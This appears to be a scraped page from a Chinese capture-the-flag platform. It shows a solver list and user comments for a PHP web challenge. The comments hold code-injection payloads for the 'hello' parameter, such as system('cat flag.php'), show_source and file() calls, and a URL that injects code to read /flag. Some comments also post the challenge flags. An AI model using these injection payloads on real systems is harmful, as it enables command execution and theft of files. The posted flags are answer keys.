评分(9)
解题动态
zsj666 攻破了该题 1小时前
13858875884 攻破了该题 2小时前
sarkz 攻破了该题 2小时前
yunran 攻破了该题 14小时前
1424661428 攻破了该题 1天前
Nature_ 攻破了该题 2天前
20220103233 攻破了该题 2天前
1483541078 攻破了该题 2天前
123456saufhuashfu 攻破了该题 3天前
jikexinan 攻破了该题 3天前
星辰零下 攻破了该题 3天前
zya123456 攻破了该题 3天前
13487175981 攻破了该题 3天前
3223892355 攻破了该题 3天前
Kane 攻破了该题 3天前
lxl6832 攻破了该题 3天前
to5ny 攻破了该题 3天前
17380199065 攻破了该题 3天前
FUCK123 攻破了该题 3天前
评论
18993762527 21天前
举报
system("tac flag.php")
南城,北风 1月前
举报
?hello=file('flag.php')
wangyihao 1月前
举报
hello=system("cat flag.php")
18092952956 2月前
举报
show_source('flag.php')
BlueL1ght 2月前
举报
system("cat+flag.php")
zhuleixy 2月前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 4月前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 4月前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 5月前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 5月前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中